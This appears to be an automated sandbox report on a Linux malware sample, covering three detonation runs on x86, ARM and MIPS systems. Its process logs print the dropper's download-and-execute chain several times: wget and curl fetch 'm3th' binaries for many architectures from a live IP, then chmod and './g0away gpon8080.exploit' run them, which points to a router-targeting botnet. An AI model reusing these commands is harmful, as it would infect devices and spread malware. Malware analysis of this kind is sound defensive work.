Analysis Overview
SHA256
36c3310e8853358d2d68f7b1f0ebd3b52f9691f58286799d1a7b9413903d5588
Threat Level: Shows suspicious behavior
The file 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 was found to show suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-28 16:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-28 16:40
Reported
2024-07-29 11:21
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
80s
Max time network
128s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/g0away | /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 | N/A |
Processes
/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
[/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]
/bin/cat
[cat m3th.x86]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]
/bin/cat
[cat m3th.mips]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]
/bin/cat
[cat m3th.mpsl]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]
/bin/cat
[cat m3th.arm]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]
/bin/cat
[cat m3th.arm5]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]
/bin/cat
[cat m3th.arm6]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]
/bin/cat
[cat m3th.arm7]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]
/bin/cat
[cat m3th.ppc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]
/bin/cat
[cat m3th.m68k]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]
/bin/cat
[cat m3th.spc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]
/bin/cat
[cat m3th.i686]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]
/bin/cat
[cat m3th.sh4]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]
/bin/cat
[cat m3th.arc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]
/tmp/g0away
[./g0away gpon8080.exploit]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 151.101.193.91:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 84.17.50.9:443 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-28 16:40
Reported
2024-07-29 10:38
Platform
debian9-armhf-20240729-en
Max time kernel
86s
Max time network
87s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/g0away | /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 | N/A |
Processes
/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
[/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]
/bin/cat
[cat m3th.x86]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-fd0610902d48473fb76a33ea0471cf99-systemd-timedated.service-Z1pgjC]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]
/bin/cat
[cat m3th.mips]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-fd0610902d48473fb76a33ea0471cf99-systemd-timedated.service-Z1pgjC]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]
/bin/cat
[cat m3th.mpsl]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]
/bin/cat
[cat m3th.arm]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]
/bin/cat
[cat m3th.arm5]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]
/bin/cat
[cat m3th.arm6]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]
/bin/cat
[cat m3th.arm7]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]
/bin/cat
[cat m3th.ppc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]
/bin/cat
[cat m3th.m68k]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]
/bin/cat
[cat m3th.spc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
Files
memory/738-1-0xb6703000-0xb6714044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-28 16:40
Reported
2024-07-29 10:54
Platform
debian9-mipsbe-20240729-en
Max time kernel
99s
Max time network
101s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/g0away | /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 | N/A |
Processes
/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
[/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]
/bin/cat
[cat m3th.x86]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]
/bin/cat
[cat m3th.mips]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]
/bin/cat
[cat m3th.mpsl]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]
/bin/cat
[cat m3th.arm]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]
/bin/cat
[cat m3th.arm5]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]
/bin/cat
[cat m3th.arm6]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]
/bin/cat
[cat m3th.arm7]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]
/bin/cat
[cat m3th.ppc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]
/bin/cat
[cat m3th.m68k]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]
/bin/cat
[cat m3th.spc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]
/bin/cat
[cat m3th.i686]
/bin/chmod
